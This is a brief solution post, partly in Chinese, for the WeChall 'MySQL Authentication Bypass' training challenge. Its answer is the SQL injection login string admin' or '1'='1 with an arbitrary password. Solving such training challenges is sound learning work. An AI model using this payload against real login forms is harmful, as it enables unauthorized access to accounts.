Training: MySQL I (MySQL, Exploit, Training)
MySQL Authentication Bypass - The classic
This one is the classic mysql injection challenge.
Your mission is easy: Login yourself as admin.
Again you are given the sourcecode, also as highlighted version.
Enjoy!
原题地址:http://www.wechall.net/challenge/training/mysql/auth_bypass1/index.php
题解:
username: admin‘ or ‘1‘=‘1
passowrd: anyone
原文地址:https://www.cnblogs.com/xiaomulei/p/10113964.html
时间: 2024-10-04 06:52:50